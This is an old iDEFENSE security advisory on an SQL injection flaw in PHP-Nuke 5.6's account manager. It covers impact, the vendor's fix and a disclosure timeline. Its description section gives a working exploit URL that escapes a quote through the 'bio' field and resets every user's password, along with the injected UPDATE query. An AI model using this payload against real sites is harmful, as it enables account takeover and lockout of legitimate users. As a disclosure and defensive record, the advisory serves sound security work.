I. BACKGROUND"PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases." More information is available at http://www.phpnuke.org.
II. DESCRIPTION
PHP-Nuke is susceptible to an SQL injection attack that allows an attacker to modify a user's table to his or her liking. It is possible for any registered user of the target system to launch this attack by feeding certain unfiltered characters to the account manager
module. The attacker can target a specific user or all system users at once. The key is the ability to insert a backslash into the "bio" field, thereby escaping a quote and leaving the SQL query open for injection. The following example will modify every PHP-Nuke users password to "1.":
Exploitation requires that the attacker log on, enter the account manager and determine his or her UID through the source of the page. If the attacker's UID is 2, he or she can then launch the attack by requesting the following URL:
modules.php?name=Your_Account&op=saveuser&uid=2&bio=%
5c&EditedMessage=no&pass=xxxxx&vpass=xxxxx&newsletter=,
+bio=0,+pass=md5(1)/*
The injected query is constructed as follows:
UPDATE nuke_users
SET name = '',
email = '',
femail = '',
url = 'http://',
pass = 'xxxxx',
+--[ bio = '\',
| user_avatar = '',
| user_icq = '',
| user_occ = '',
| user_from = '',
| user_intrest = '',
| user_sig = '',
| user_aim = '',
| user_yim = '',
| user_msnm = '',
+--[ newsletter = ',
bio=0,pass=md5(1)/*' WHERE uid='2'
The marked area is all treated as a value to store into bio. The "where" clause is commented out, leaving an update statement that updates the entire table (ie: all users) to having a password of MD5(1).
III. ANALYSIS
Exploitation allows an attacker to compromise any other system account, thereby gaining the privileges and identification of the compromised account. The attacker can also corrupt the entire user's table, effectively denying service to legitimate users.
IV. DETECTIONiDEFENSE Labs successfully tested and exploited this vulnerability in PHP-Nuke 5.6, Unix version. As the described exploit is dangerous in nature, administrators should not test in a production environment.
V. VENDOR FIXFrancisco Burzi responded:
"PHP-Nuke version 6.0 is not vulnerable to the SQL injection attack...
Latest version is 6.0 and 6.5 under development. Old versions doesn't have support of any kind, all bugs and security fixes apply in the new versions. So, the solution to this security hole is to update the software from 5.6 to 6.0 version."
VI. CVE INFORMATIONThe Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has assigned the identification number CAN-2002-1242 to this issue.
VII. DISCLOSURE TIMELINE
| 09/17/2002 |
Issue disclosed to iDEFENSE |
| 09/23/2002 |
Author notified through submission form |
| 09/23/2002 |
iDEFENSE clients notified |
| 10/01/2002 |
iDEFENSE second attempt at PHP-Nuke contact |
| 10/20/2002 |
iDEFENSE third attempt at PHP-Nuke contact |
| 10/31/2002 |
Response from Francisco Burzi (nukelite@users.sourceforge.net) |
| 10/31/2002 |
Coordinated Public Disclosure |
VIII. CREDIT
kill9 (kill9@hackers.com) is credited with discovering this vulnerability.
